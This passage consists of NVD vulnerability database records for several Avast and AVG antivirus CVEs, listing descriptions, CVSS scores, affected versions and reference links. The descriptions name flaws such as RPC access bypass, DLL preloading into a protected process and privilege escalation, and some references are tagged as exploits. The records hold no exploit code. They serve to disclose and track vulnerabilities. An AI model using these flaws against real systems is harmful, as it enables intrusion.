Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to enumerate the network interfaces and access points from a Low Integrity process via RPC." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes enumerar las interfaces de red y los puntos de acceso a partir de un proceso Low Integrity por medio de una RPC." } ], "id": "CVE-2020-10866", "lastModified": "2024-11-21T04:56:15.160", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T18:15:14.600", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-326" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to make arbitrary changes to the Components section of the Stats.ini file via RPC from a Low Integrity process." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes realizar cambios arbitrarios en la secci\u00f3n Components del archivo Stats.ini por medio de una RPC a partir de un proceso Low Integrity." } ], "id": "CVE-2020-10865", "lastModified": "2024-11-21T04:56:15.013", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T18:15:14.457", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-829" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://www.securityfocus.com/bid/98084 | Third Party Advisory, VDB Entry | |
cve@mitre.org | https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201 | Exploit, Technical Description, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/98084 | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201 | Exploit, Technical Description, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "54ED80B2-E917-49FA-9FD8-C6010E8CBA5B", "versionEndIncluding": "12.3.2279", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "In Avast Antivirus before v17, an unprivileged user (and thus malware or a virus) can mark an arbitrary process as Trusted from the perspective of the Avast product. This bypasses the Self-Defense feature of the product, opening a door to subsequent attack on many of its components." }, { "lang": "es", "value": "En Avast Antivirus anteriores a v17, un usuario no privilegiado puede marcar un proceso arbitrario como Trusted desde la perspectiva del producto Avast. Esto evita la caracter\u00edstica de Self-Defense del producto, abriendo una puerta a un ataque posterior en muchos de sus componentes." } ], "id": "CVE-2017-8308", "lastModified": "2025-04-20T01:37:25.860", "metrics": { "cvssMetricV2": [ { "acInsufInfo": true, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2017-04-27T20:59:00.200", "references": [ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/98084" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/98084" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Deferred", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-269" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses | Exploit, Technical Description, Third Party Advisory | |
cve@mitre.org | https://safebreach.com/blog | Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses | Exploit, Technical Description, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://safebreach.com/blog | Third Party Advisory |
Vendor | Product | Version | |
---|---|---|---|
avast | antivirus | * | |
avg | anti-virus | * |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "49F47FA8-32A2-415C-9E44-C9442E2A6151", "versionEndExcluding": "19.8", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:anti-virus:*:*:*:*:*:*:*:*", "matchCriteriaId": "3CA072C3-5309-4CC3-B8B0-5CE78F914BE4", "versionEndExcluding": "19.8", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast antivirus before 19.8 and AVG antivirus before 19.8. A DLL Preloading vulnerability allows an attacker to implant %WINDIR%\\system32\\wbemcomn.dll, which is loaded into a protected-light process (PPL) and might bypass some of the self-defense mechanisms. This affects all components that use WMI, e.g., AVGSvc.exe 19.6.4546.0 and TuneupSmartScan.dll 19.1.884.0." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast antivirus versiones anteriores a 19.8 y AVG antivirus versiones anteriores a 19.8. Una vulnerabilidad de Precarga de DLL permite a un atacante implantar una biblioteca %WINDIR%\\system32\\wbemcomn.dll, que se carga en un proceso protected-light (PPL) y puede omitir algunos de los mecanismos de autodefensa. Esto afecta a todos los componentes que usan WMI, por ejemplo, AVGSvc.exe versi\u00f3n 19.6.4546.0 y TuneupSmartScan.dll versi\u00f3n 19.1.884.0." } ], "id": "CVE-2019-17093", "lastModified": "2024-11-21T04:31:40.653", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2019-10-23T17:15:12.850", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://safebreach.com/blog" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://safebreach.com/Post/Avast-Antivirus-AVG-Antivirus-DLL-Preloading-into-PPL-and-Potential-Abuses" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://safebreach.com/blog" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-427" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. An Arbitrary Memory Address Overwrite vulnerability in the aswAvLog Log Library results in Denial of Service of the Avast Service (AvastSvc.exe)." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. Una vulnerabilidad de Sobrescritura de Direcci\u00f3n de Memoria Arbitraria en la aswAvLog Log Library que resulta en una Denegaci\u00f3n de Servicio del Avast Service (AvastSvc.exe)." } ], "id": "CVE-2020-10860", "lastModified": "2024-11-21T04:56:14.247", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T17:15:15.813", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-787" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to bypass intended access restrictions on tasks from an untrusted process, when Self Defense is enabled." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes omitir las restricciones de acceso previstas en tareas a partir de un proceso no confiable, cuando Self Defense est\u00e1 habilitado." } ], "id": "CVE-2020-10867", "lastModified": "2024-11-21T04:56:15.307", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T18:15:15.507", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-668" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "9530DCD6-2AE4-4E7E-A67A-5E5F87CE3DF3", "versionEndExcluding": "20.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Multiple privilege escalation vulnerabilities in Avast Antivirus prior to 20.4 allow a local user to gain elevated privileges by calling unnecessarily powerful internal methods of the main antivirus service which could lead to the (1) arbitrary file delete, (2) write and (3) reset security." }, { "lang": "es", "value": "M\u00faltiples vulnerabilidades de escalada de privilegios en Avast Antivirus versiones anteriores a 20.4, permiten a un usuario local alcanzar privilegios elevados al llamar a m\u00e9todos internos innecesariamente potentes del servicio antivirus principal, lo que podr\u00eda conllevar el (1) borrado arbitrario de archivos, (2) escritura y (3) restablecimiento de la seguridad" } ], "id": "CVE-2021-45338", "lastModified": "2024-11-21T06:32:06.587", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2021-12-27T14:15:08.170", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.3" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST1.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-Other" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
